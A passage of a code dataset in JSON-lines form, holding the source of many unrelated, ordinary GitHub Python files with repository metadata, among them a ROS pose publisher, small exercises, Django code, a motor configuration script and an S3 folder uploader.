consoleLogLevel = logging.CRITICAL\n    initLogger(\"access\", logPath + \"/piledcontrol_access.log\", fileLogLevel, consoleLogLevel)\n    logging.getLogger().setLevel(100)\n\n\ndef getArguments():\n    parser = argparse.ArgumentParser(description='This is the server of pi-led-control')\n    parser.add_argument('-n', '--name', help='the hostname on which pi-led-control is served', default='')\n    parser.add_argument('-p', '--port', help='the port on which pi-led-control is served', type=int, default=9000)\n    parser.add_argument('-c', '--configPath', help='the path to the config file to be used',\n                        default=\"../pi-led-control.config\")\n    logLevelsRange = [logging.NOTSET, logging.DEBUG, 
logging.INFO, logging.WARN, logging.ERROR, logging.CRITICAL]\n parser.add_argument('-l', '--logPath', help='the path to the log folder to be used',\n default=os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n parser.add_argument('-fl', '--fileLogLevel', help='the log level for the logfile', type=int, choices=logLevelsRange,\n default=logging.INFO)\n parser.add_argument('-cl', '--consoleLogLevel', help='the log level for the console', type=int,\n choices=logLevelsRange, default=logging.ERROR)\n parser.add_argument('-atc', '--accessLogToConsole', help='set to True to print access log entries to console',\n type=bool, default=False)\n return vars(parser.parse_args())\n\n\ndef startCrossbar(crossbarConfigPath):\n global crossbarManager\n try:\n crossbarManager = CrossbarManager(crossbarConfigPath)\n crossbarManager.start()\n logging.info(\"crossbar started with config \" + crossbarConfigPath)\n except Exception as e:\n logging.warning(\"failed to start crossbar \" + str(e))\n\n\ndef startServer(hostName, port, configPath):\n global ledServer\n try:\n ledServer = LEDServer((hostName, port), LEDManager(), ConfigurationManager(configPath))\n except OSError as e:\n if str(e) == \"[Errno 98] Address already in use\":\n logging.getLogger(\"main\").critical(\"can't init server, port is already in use\")\n else:\n raise e\n else:\n try:\n ledServer.serve_forever()\n except KeyboardInterrupt:\n cleanUpAndExit(None, None)\n\n\ndef cleanUpAndExit(signal_type, frame):\n global ledServer\n global crossbarManager\n print('Cancelled!')\n crossbarManager.stop()\n ledServer.server_close()\n sys.exit(0)\n\n\ndef main():\n args = getArguments()\n\n initLogging(args['logPath'], args['fileLogLevel'], args['consoleLogLevel'], args['accessLogToConsole'])\n\n signal.signal(signal.SIGINT, cleanUpAndExit)\n startCrossbar(os.path.dirname(os.path.realpath(__file__)) + \"/server/crossbarintegration/crossbar_config\")\n startServer(args['name'], args['port'], args['configPath'])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"s0riak/pi-led-control","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4219,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"11705746351","text":"#!/usr/bin/env python3\nimport rospy, roslib, tf\n\nfrom PyKDL import *\nfrom math import pi\nfrom geometry_msgs.msg import Pose, PoseArray\n\ndef publish_link():\n\t\"\"\"\n\tReceive tf data(it suggests position of link frame relative to previous link frame) from indy7 robot,\n\tand publish data of these points as PoseArray.\n\t\"\"\"\n\trospy.init_node('link_publisher')\n\tpub = rospy.Publisher('link', PoseArray, queue_size=1)\n\trate = rospy.Rate(10)\n\tlistener = tf.TransformListener()\n\ttrans = [0 for j in range(8)]\n\trot = [0 for k in range(8)]\n\n\twhile not rospy.is_shutdown():\n\n\t\tpose_linklist = PoseArray()\n\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\t(trans[0], rot[0]) = listener.lookupTransform('/world', '/link0', rospy.Time(0))\n\t\t\t\t(trans[1], rot[1]) = listener.lookupTransform('/link0', '/link1', rospy.Time(0))\n\t\t\t\t(trans[2], rot[2]) = listener.lookupTransform('/link1', '/link2', rospy.Time(0))\n\t\t\t\t(trans[3], rot[3]) = listener.lookupTransform('/link2', '/link3', rospy.Time(0))\n\t\t\t\t(trans[4], rot[4]) = listener.lookupTransform('/link3', '/link4', rospy.Time(0))\n\t\t\t\t(trans[5], rot[5]) = listener.lookupTransform('/link4', '/link5', rospy.Time(0))\n\t\t\t\t(trans[6], rot[6]) = 
listener.lookupTransform('/link5', '/link6', rospy.Time(0))\n\t\t\t\t(trans[7], rot[7]) = listener.lookupTransform('/link6', '/tcp', rospy.Time(0))\n\t\t\t\tbreak\n\t\t\texcept (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n\t\t\t\tcontinue\n\n\t\tfor i in range(8):\n\t\t\tpose_link = Pose()\n\n\t\t\tif i == 0 :\n\t\t\t\tpose_link.position.x = trans[i][0] + 0.5\n\t\t\telse :\n\t\t\t\tpose_link.position.x = trans[i][0]\n\t\t\t\t\n\t\t\tpose_link.position.y = trans[i][1]\n\t\t\tpose_link.position.z = trans[i][2]\n\t\t\tpose_link.orientation.x = rot[i][0]\n\t\t\tpose_link.orientation.y = rot[i][1]\n\t\t\tpose_link.orientation.z = rot[i][2]\n\t\t\tpose_link.orientation.w = rot[i][3]\n\n\t\t\tpose_linklist.poses.append(pose_link)\n\n\t\tpub.publish(pose_linklist)\n\t\trate.sleep()\n\nif __name__ == '__main__':\n\ttry:\n\t\tpublish_link()\n\texcept rospy.ROSInterruptException:\n\t\tpass","repo_name":"1Gyu1/ros-noetic","sub_path":"ros-noetic-pkgs/tf_manager/src/link_publisher.py","file_name":"link_publisher.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12511016737","text":"# BMI Calculator 2.0 - Incorporating if statements ( not that i didn't do it in the last calculator.. )\nheight = float(input(\"enter your height in m: \"))\nweight = float(input(\"enter your weight in kg: \"))\n\nbmi = weight / (height ** 2)\nrounded_bmi = round(bmi)\ntemplate = f\"Your BMI is {rounded_bmi}, you\"\n\nif bmi < 18.5:\n print(f\"{template} are underweight.\")\nelif bmi >= 18.5 and bmi < 25:\n print(f\"{template} have a normal weight.\")\nelif bmi >= 25 and bmi < 30:\n print(f\"{template} are slightly overweight.\")\nelif bmi >= 30 and bmi < 35:\n print(f\"{template} are obese.\")\nelif bmi >= 35:\n print(f\"{template} are clinically obese.\")\n","repo_name":"hristo2612/100-days-of-code-python","sub_path":"Day 3 - Control Flow & Logical Operators/3_2_BMI_Calculator.py","file_name":"3_2_BMI_Calculator.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41190728813","text":"import FWCore.ParameterSet.Config as cms\n\ncscPacker = cms.EDProducer('CSCDigiToRawModule',\n useFormatVersion = cms.uint32(2005),\n usePreTriggers = cms.bool(True),\n packEverything = cms.bool(False),\n useGEMs = cms.bool(False),\n wireDigiTag = cms.InputTag('simMuonCSCDigis', 'MuonCSCWireDigi'),\n stripDigiTag = cms.InputTag('simMuonCSCDigis', 'MuonCSCStripDigi'),\n comparatorDigiTag = cms.InputTag('simMuonCSCDigis', 'MuonCSCComparatorDigi'),\n alctDigiTag = cms.InputTag('simCscTriggerPrimitiveDigis'),\n clctDigiTag = cms.InputTag('simCscTriggerPrimitiveDigis'),\n preTriggerTag = cms.InputTag('simCscTriggerPrimitiveDigis'),\n correlatedLCTDigiTag = cms.InputTag('simCscTriggerPrimitiveDigis', 'MPCSORTED'),\n padDigiClusterTag = cms.InputTag('simMuonGEMPadDigiClusters'),\n alctWindowMin = cms.int32(-3),\n alctWindowMax = cms.int32(3),\n clctWindowMin = cms.int32(-3),\n clctWindowMax = cms.int32(3),\n preTriggerWindowMin = cms.int32(-3),\n preTriggerWindowMax = cms.int32(1),\n mightGet = cms.optional.untracked.vstring\n)\n","repo_name":"cms-sw/cmssw-cfipython","sub_path":"EventFilter/CSCRawToDigi/cscPacker_cfi.py","file_name":"cscPacker_cfi.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} 
+{"seq_id":"22545730807","text":"\"\"\"Time-string display format\"\"\"\r\n\r\nWHSH_FUCK_TO_TIME = '%Y年%m月%d日 %H:%M:%S'\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\"\"\"Initial conversion time string\"\"\" #### Do not modify; change at your own risk ####\r\n\r\nWHSH_FUCK_TIME = '%Y-%m-%dT%H:%M:%S+0000'","repo_name":"ALiangLiang/Uto2.0","sub_path":"commands/config/TimeConfig.py","file_name":"TimeConfig.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35784568501","text":"# Given two sorted integer arrays nums1 and nums2, merge nums2 into nums1 as one\n# sorted array.\n#\n# The number of elements initialized in nums1 and nums2 are m and n respectively.\n# You may assume that nums1 has enough space (size that is equal to m + n) to\n# hold additional elements from nums2.\n#\n#\n# Example 1:\n# Input: nums1 = [1,2,3,0,0,0], m = 3, nums2 = [2,5,6], n = 3\n# Output: [1,2,2,3,5,6]\n# Example 2:\n# Input: nums1 = [1], m = 1, nums2 = [], n = 0\n# Output: [1]\n#\n#\n# Constraints:\n#\n#\n# 0 <= n, m <= 200\n# 1 <= n + m <= 200\n# nums1.length == m + n\n# nums2.length == n\n# -10^9 <= nums1[i], nums2[i] <= 10^9\n#\n# Related Topics Array Two Pointers\n# 👍 3054 👎 4761\n\n\n# trial and error\n# for digit in nums1:\n#     if digit == 0:\n#         nums1.remove(digit[m])\n\n# This did not work either\n# nums1 = nums1 + nums2\n# nums1.sort()\n#\n# remove = [nums1.pop(0) for i in range(m)]\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n    def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:\n        \"\"\"\n        Do not return anything, modify nums1 in-place instead.\n        \"\"\"\n        i = 0\n        for j in nums2[:n]:\n            nums1[m + i] = j\n            i += 1\n        nums1.sort()\n\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"chrishamlin98/Algorithm-Challenges","sub_path":"Python Based/LeetCode Practice/[88]Merged Sorted Array.py","file_name":"[88]Merged Sorted Array.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25619206578","text":"# SWEA 11789\n# From a 1-D array of 0s and 1s, group every 7 bits (one character) and print them as decimal numbers\n\nT = int(input())\n\n\ndef bin_to_dec(num):\n    dec_arr = []\n    for i in range(0, len(num), 7):\n        bin_num = num[i:i+7]\n        dec_num = 0\n        for j in range(7):\n            if bin_num[j] == \"1\":\n                dec_num += 2**(6-j)\n        dec_arr.append(str(dec_num))\n    return dec_arr\n\n\ndef bin_to_dec(num):\n    dec_arr = []\n    for i in range(0, len(num), 7):\n        dec_arr.append(str(int(num[i:i+7], 2)))\n    return dec_arr\n\n\ndef BtoD(byte, num):\n    decimal = []\n    for i in range(len(num)//byte):\n        binary = num[i*byte:(i+1)*byte]\n        d, b = 0, 1\n        for j in range(byte-1, -1, -1):  # 0010101\n            d += int(binary[j])*b\n            b <<= 1\n        decimal.append(str(d))\n    return decimal\n\n\n# def BtoD(byte, num):\n#     rtn = []\n#     for i in range(len(num)//byte):\n#         binary = num[i*byte:(i+1)*byte][::-1]  # [::-1] to read from the back\n#         D = sum(int(binary[j]) & (1 << j) for j in range(byte))  # convert to decimal\n#         rtn.append(str(D))\n#     return rtn\n\n\nfor tc in range(1, T+1):\n    bit_num = input()\n    print(\"#%d %s\" % (tc, \", \".join(bin_to_dec(bit_num))))\n\nprint(BtoD(7, '1000101'))","repo_name":"minnczi/Algorithm","sub_path":"Swea/swea_11789.py","file_name":"swea_11789.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2902726854","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, 
migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='codingninja',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('img1', models.CharField(max_length=250)),\n ('img2', models.CharField(max_length=250)),\n ('img3', models.CharField(max_length=250)),\n ('knowmore', models.CharField(max_length=1000)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='fragmentname',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('identifier', models.CharField(max_length=100, null=True)),\n ('name', models.CharField(default=b'NULL', max_length=250)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='mall',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('img1', models.CharField(default=b'NULL', max_length=250)),\n ('img2', models.CharField(default=b'NULL', max_length=250)),\n ('img3', models.CharField(default=b'NULL', max_length=250)),\n ('knowmore', models.CharField(default=b'NULL', max_length=1000)),\n ('name', models.ForeignKey(to='main.fragmentname')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='codingninja',\n name='name',\n field=models.ForeignKey(to='main.fragmentname'),\n preserve_default=True,\n ),\n ]\n","repo_name":"vishrutkohli/Info-me","sub_path":"testing/main/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"34597291398","text":"from skimage import io, transform\nfrom scipy import ndimage\nimport numpy as np\nimport os\nimport glob\n\ndef normalize(image):\n return (image - np.min(image)) / (np.max(image) - np.min(image))\n\ndef make_rgb(normalized_image):\n one_channel = (normalized_image * 255).astype(np.uint8)\n return np.stack((one_channel, one_channel, one_channel), axis=-1)\n\ndef save_interpolated_images(image_path, scale_factor):\n image = io.imread(image_path, as_gray=True)\n image = transform.resize(image, (128, 256))\n \n # Normalize the image\n image = normalize(image)\n\n # Nearest neighbor interpolation\n resized_nearest = ndimage.zoom(image, scale_factor, order=0, prefilter=False, mode='nearest')\n resized_nearest = normalize(resized_nearest)\n resized_nearest = make_rgb(resized_nearest)\n base_name = os.path.basename(image_path).split('.')[0]\n io.imsave(f\"{base_name}_expected_nearest_{scale_factor:.1f}.ppm\", resized_nearest, check_contrast=False)\n \n # Bilinear interpolation\n resized_bilinear = ndimage.zoom(image, scale_factor, order=1, prefilter=False, mode='nearest')\n resized_bilinear = normalize(resized_bilinear)\n resized_bilinear = make_rgb(resized_bilinear)\n base_name = os.path.basename(image_path).split('.')[0]\n io.imsave(f\"{base_name}_expected_bilinear_{scale_factor:.1f}.ppm\", resized_bilinear, check_contrast=False)\n \n # Bicubic interpolation\n resized_bicubic = ndimage.zoom(image, scale_factor, order=3, prefilter=False, mode='nearest')\n resized_bicubic = normalize(resized_bicubic)\n resized_bicubic = make_rgb(resized_bicubic)\n base_name = os.path.basename(image_path).split('.')[0]\n io.imsave(f\"{base_name}_expected_bicubic_{scale_factor:.1f}.ppm\", resized_bicubic, check_contrast=False)\n\nif __name__ == 
'__main__':\n    # Get all .png files in the current directory\n    png_files = glob.glob('./*.png')\n    print(png_files)\n\n    scale_factor = 0.5  # try 0.5 and 2.0\n    for png_file in png_files:\n        save_interpolated_images(png_file, scale_factor)\n","repo_name":"tonyfu97/VisualAlgo","sub_path":"datasets/ImagePreprocessingAndEnhancement/testInterpolateFig.py","file_name":"testInterpolateFig.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29887838392","text":"def binary_search(target, data):\n\n    start = 0\n    end = len(data) - 1\n\n    while start <= end:\n        mid = (start + end) // 2\n        if data[mid] == target:\n            return mid\n        elif data[mid] < target:\n            start = mid + 1\n        else:\n            end = mid - 1\n    return None\n\nnum1 = input()\n# materialize and sort the values; binary search needs an indexable, sorted sequence\nArray1 = sorted(map(int, input().split()))\n\nnum2 = input()\nArray2 = input().split()\n\nfor i in Array2:\n    target = int(i)\n    if binary_search(target, Array1) is None:\n        print(0)\n    else:\n        print(1)","repo_name":"pillow12360/Programmers_for_Coding_Test","sub_path":"dong_chan/백준/이전/0508수찾기.py","file_name":"0508수찾기.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"44447057202","text":"import pandas as pd\nimport re\n\ndfin = \"wot9.tsv\"\ndfout = \"wot10.tsv\"\n\ndef cln(w):\n    w = w.strip()\n    for i in \"-*?()\":\n        w = w.replace(i,\"\")\n    w = re.sub(\"\\{[^\\}]*?}\", \"\", w)\n    w = re.sub(\"\\‘[^\\’]*?’\", \"\", w)\n    w = re.sub(\"etc.\", \"\", w)\n    w = re.split(\"[><←→]\", w)[0]\n\n    return w.strip()\n\ndf = pd.read_csv(dfin, sep=\"\\t\")\ndf[\"donor\"] = [cln(i) for i in df[\"donor\"]]\ndf.to_csv(dfout, sep=\"\\t\", encoding=\"utf-8\", index=False)\n","repo_name":"LoanpyDataHub/ronataswestoldturkic","sub_path":"raw/misc/wrangling/clndonor.py","file_name":"clndonor.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34525761601","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\n\nfrom discord import Message\n\nfrom hyacinth.discord.notifier_setup import NotifierSetupInteraction\nfrom hyacinth.plugin import Plugin, get_plugins\n\nif TYPE_CHECKING:\n    from hyacinth.discord.discord_bot import DiscordNotifierBot\n\n\nasync def create_notifier(\n    bot: DiscordNotifierBot, message: Message, plugin_name: str, params: dict[str, str] | None\n) -> None:\n    plugin: Plugin | None = None\n    for p in get_plugins():\n        if p.command_reference_name == plugin_name:\n            plugin = p\n            break\n\n    if plugin is None:\n        await message.channel.send(\n            f'Sorry {message.author.mention}, \"{plugin_name}\" is not a source I support sending'\n            \" notifications for.\"\n        )\n        return\n\n    setup_interaction = NotifierSetupInteraction(bot, message, plugin)\n\n    if not params:\n        await setup_interaction.begin()\n        bot.active_threads[setup_interaction.thread_id] = setup_interaction\n    else:\n        setup_interaction.answers = params\n        await setup_interaction.finish()\n        await message.channel.send(\n            f\"{bot.affirm()} {message.author.mention}, I've created a search for you\"\n            f\" based on the following parameters:\\n```{params}```\"\n        )\n","repo_name":"lmesa008/bot","sub_path":"hyacinth/discord/commands/notify.py","file_name":"notify.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"42851965275","text":"from django import test\n\nfrom partidillos.partidillosapp.views import main\nfrom partidillos.partidillosapp import models\n\nfrom partidillos import settings\n\n\nclass InvitePlayerTestCase(test.TestCase):\n\n    # when the request is GET, return the form with empty fields\n    def test_inviteget_noplayers(self):\n        response = self.client.get('/match/create/')  # endpoint assumed, mirroring the POST test below\n        self.assertEqual(response.context['form']['players'].value(), None)\n        self.assertEqual(response.context['form']['place'].value(), None)\n        self.assertEqual(response.status_code, 200)\n\n    # when the request is POST, create the match and redirect\n    def testCreateMatchPost(self):\n        response = self.client.post('/match/create/', \n            {'dia': self.datestr, 'hora': self.timestr, 'place': self.place})\n        self.assertEqual(response.status_code, 302)\n        self.assertRedirects(response, '/mymatches.html')\n\n","repo_name":"txominpelu/partidillos","sub_path":"partidillos/partidillosapp/test/inviteplayers_test.py","file_name":"inviteplayers_test.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74582755074","text":"#!/usr/bin/env python3.10\n\nimport rospy\nimport time\nimport signal\nimport sys\nimport threading  # Import the threading module\nfrom geometry_msgs.msg import Twist\nfrom tinymovr.tee import init_tee\nfrom tinymovr.config import create_device,get_bus_config\nimport can\nfrom std_msgs.msg import Float64\nimport matplotlib.pyplot as plt\nfrom collections import deque\nimport time\nimport glob\n\nAXLE_LENGTH = 0.76  # distance between the left and right wheels\nWHEEL_RADIUS = 0.19  # radius of each wheel\n\nclass configs:\n    \n    def __init__(self):\n        rospy.init_node('bldc_nodee', anonymous=True)\n\n        pattern = '/dev/ttyACM*'\n        matching_devices = self.find_serial_devices(pattern)\n\n        if matching_devices:\n            # If matching devices are found, use the first one as the channel\n            channel = matching_devices[0]\n        else:\n            # If no matching devices are found, use \"/dev/ttyACM0\" as a default\n            channel = \"/dev/ttyACM0\"\n\n        params = get_bus_config()\n        params[\"interface\"] = \"slcan\"\n        params[\"bitrate\"] = 1000000\n        params[\"channel\"] = channel\n        init_tee(can.Bus(**params))\n\n        self.tm3 = create_device(node_id=3)\n        self.tm2 = create_device(node_id=2)\n        \n        self.tm3.reset()\n        self.tm2.reset()\n\n        self.tm3.encoder.type = 1\n        self.tm3.motor.pole_pairs = 4\n        self.tm3.controller.velocity.p_gain = 0.007\n        self.tm3.controller.velocity.i_gain = 0.001\n        self.tm3.save_config()\n        self.tm3.reset()\n        time.sleep(3)\n\n        self.tm2.encoder.type = 1\n        self.tm2.motor.pole_pairs = 4\n        self.tm2.controller.velocity.p_gain = 0.007\n        self.tm2.controller.velocity.i_gain = 0.001\n        self.tm2.save_config()\n        self.tm2.reset()\n        time.sleep(3)\n\n        self.rate = rospy.Rate(10)\n\n        # Create a lock for thread safety\n        self.lock = threading.Lock()\n\n        self.enc_time_buffer = deque(maxlen=100)\n        self.enc_vel_estTM1_buffer = deque(maxlen=100)\n        self.enc_vel_estTM2_buffer = deque(maxlen=100)\n","repo_name":"norsechurros/Motor_Control","sub_path":"src/TinyM/src/configs1.0.py","file_name":"configs1.0.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
in range(10):\r\n\t\ts[i] = s[-i-1] = str(n)\r\n\t\tfind_palindromes(s, i+1, l)\r\n\r\n\r\ndef case():\r\n\r\n\tA, B = [int(x) for x in input().split(' ')]\r\n\t\r\n\tstart = int(math.ceil(A**.5))\r\n\tend = int(B**.5)\r\n\r\n\t#print (start, end)\r\n\r\n\tcount = 0\r\n\tfor i in palindromes:\r\n\t\tif i > end:\r\n\t\t\tbreak\r\n\r\n\t\tif i >= start and i*i in palindromes:\r\n\t\t\t#print (i, ',', i*i)\r\n\t\t\tcount += 1\r\n\r\n\r\n\tsys.stdout.write(str(count))\r\n\r\n\r\n\r\n\r\nif __name__==\"__main__\":\r\n\r\n\ts = []\r\n\tfor i in range(3):\r\n\t\ts.append('0')\r\n\t\tfind_palindromes(s, 0, len(s));\r\n\tpalindromes = sorted(palindromes)\r\n\t#print(palindromes)\r\n\r\n\tif len(sys.argv) > 1:\r\n\t\tsys.stdin = open(sys.argv[1])\r\n\r\n\tnum_cases = int(input())\r\n\r\n\tfor c in range (1, num_cases+1):\r\n\t\tsys.stdout.write('Case #')\r\n\t\tsys.stdout.write(str(c))\r\n\t\tsys.stdout.write(': ')\r\n\t\tcase()\r\n\t\tsys.stdout.write('\\n')\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_118/1017.py","file_name":"1017.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74286107073","text":"import requests\nbody = {\n \n \"open_price\": 1007700,\n \"close_price\": 1077500,\n \"volume\": 10884400\n }\nresponse = requests.post(url = 'https://bitcoin-price-service-jesussaith.cloud.okteto.net/predict_price',\n json = body)\nprint (response.json())\n# output: {'score': 0.866490130600765}\n","repo_name":"JesusSaith/Bitcoin-Price","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33889062685","text":"# 분해합\n\nN = int(input())\nn = N - (9 * 6)\nans = 0\n\nfor i in range(n, N):\n a = i\n j = i\n while(j > 0):\n a += j % 10\n j = int(j/10)\n if a == N:\n ans = i\n break\n else:\n continue\nprint(ans)\n","repo_name":"dyeong-00/Language_study","sub_path":"BaekJoon/2231.py","file_name":"2231.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29903435075","text":"import networkx as nx\nimport matplotlib.pyplot as plt\n\nwith open('./graph.txt') as f:\n lines = f.read().splitlines()\n g = nx.Graph()\n\n for line in lines:\n splitted_line = list(map(lambda x: x.strip(), line.split(' ')))\n data = dict()\n\n for arg in splitted_line:\n arg = arg.split('=')\n data[arg[0]] = arg[1]\n\n if 'flot=' in line:\n parent_label = data['ID'].split(':')[0]\n child_label = data['ID'].split(':')[1]\n\n edge_color = 'black'\n show_edge = True\n\n if parent_label == 'source':\n edge_color = 'blue'\n #show_edge = False\n\n if child_label == 'puits':\n edge_color = 'red'\n #show_edge = False\n\n if show_edge:\n g.add_edge(parent_label, child_label, length=100,\n capacity=int(data['capacite']), color=edge_color, label=f'{data[\"flot\"]}/{data[\"capacite\"]}')\n\n else:\n if data['ID'].split('-')[0] != 'source' and data['ID'].split('-')[0] != 'puits':\n x = int(data['ID'].split('-')[0]) * 10 * 10\n y = int(data['ID'].split('-')[1]) * -10 * 10\n\n elif data['ID'].split('-')[0] == 'source':\n x = -200\n y = -150\n\n elif data['ID'].split('-')[0] == 'puits':\n x = 150\n y = 200\n\n label = f'{data[\"ID\"]}' # - a={data[\"a\"]} b={data[\"b\"]}\n g.add_node(label, pos=(x, y))\n\n plt.figure(figsize=(24, 24))\n\n ax = plt.gca()\n 
ax.set_title('Titre')\n\n edges = g.edges()\n colors = [g[u][v]['color'] for u, v in edges]\n weights = [2 for u, v in edges]\n\n positions = nx.get_node_attributes(g, 'pos')\n nx.draw(g, positions, edge_color=colors,\n width=weights, with_labels=True, ax=ax)\n\n labels = nx.get_edge_attributes(g, 'label')\n\n nx.draw_networkx_edge_labels(\n g, positions, edge_labels=labels, label_pos=0.5, ax=ax)\n\n _ = ax.axis('off')\n plt.savefig(f'./graph.png')\n plt.show()\n","repo_name":"TristanFaine/Graphes2M1","sub_path":"graph_visualizer.py","file_name":"graph_visualizer.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27528737916","text":"import json\nimport csv\nfrom opencc import OpenCC\n\n\nclass DataHelper:\n def makeCSV(self):\n file = open('data_train.json',encoding='utf-8')\n facts = []\n accusations = []\n\n theft = 0\n harm = 0\n fraud = 0\n\n cc = OpenCC('s2t')\n for data in file:\n data = json.loads(data)\n\n fact = data['fact']\n crime = data['meta']['accusation'][0]\n\n if crime == '盗窃' or crime == '故意伤害' or crime == '诈骗':\n if crime == '盗窃' and theft < 1000:\n theft += 1\n facts.append(cc.convert(fact))\n accusations.append(cc.convert(crime))\n elif crime == '故意伤害' and harm < 1000:\n harm += 1\n facts.append(cc.convert(fact))\n accusations.append(cc.convert(crime))\n elif crime == '诈骗' and fraud < 1000:\n fraud += 1\n facts.append(cc.convert(fact))\n accusations.append(cc.convert(crime))\n\n with open('crime.csv', 'w', newline='',encoding='utf-8') as csvfile:\n fieldnames = ['Fact', 'accusation']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n for i in range(len(accusations)):\n writer.writerow({'Fact' : facts[i],'accusation' : accusations[i]})\n\n\n def get_data(self):\n csvfile = open('crime.csv',newline='',encoding='utf-8')\n reader = csv.DictReader(csvfile)\n facts = []\n accusations = []\n for row in reader:\n facts.append(row['Fact'])\n accusations.append(row['accusation'])\n return facts,accusations\n","repo_name":"pohjohn0928/crime_model","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31735308811","text":"from nltk.tokenize import word_tokenize, sent_tokenize\nline = \"Hello! 'Welcome to text pre-processing session.' Do you know python? Mr. XXX is the tutor for this session.\"\ntokens = word_tokenize(line)\nprint(tokens)\n\nsentences = sent_tokenize(line)\nprint(sentences)\n\n\n\n\n##import nltk\n##tokenizer = nltk.data.load('tokennizers/punkt/english.pickle')\n##line = \"Hello! Welcome to text pre-processing session. Do you know python? Mr. 
XXX is the tutor for this session\"\n##print(tokenizer.tokenize(line))\n","repo_name":"saran-sankar/Jarvis","sub_path":"Program_Files/nlp/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"40049907812","text":"import boto3\nimport os\nimport sys\n\n#s3 = boto3.client(\n#    's3',\n#    aws_access_key_id='###AWS_ACCESS_KEY###',\n#    aws_secret_access_key='###AWS_SECRET_KEY###'\n#)\n\n\ns3 = boto3.client('s3')\nsearchpath=sys.argv[1]\n#print(sys.argv[1])\n\nfor root,d_names,f_names in os.walk(searchpath):\n    for f in f_names:\n        folder=os.path.realpath(root).split('/')\n        s3path=folder[len(folder)-2] + '/' + folder[len(folder)-1] + '/' + f\n        #s3.upload_file('windows.version', 'hiaas-vmimage-dev', 'windows.version')\n        print(s3path)\n        file=root + '/' + f\n        s3.upload_file(file, 'hiaas-vmimage-dev', s3path)\n        #print(file)\n        #print(f)\n","repo_name":"oizone/vm-imager-win","sub_path":"uploads3.py","file_name":"uploads3.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42663807779","text":"from manim import *\nfrom typing import Tuple\n\n\nclass Equations(MathTex):\n\n    def __init__(self, *equations: str, **kwargs):\n        MathTex.__init__(self, *equations, 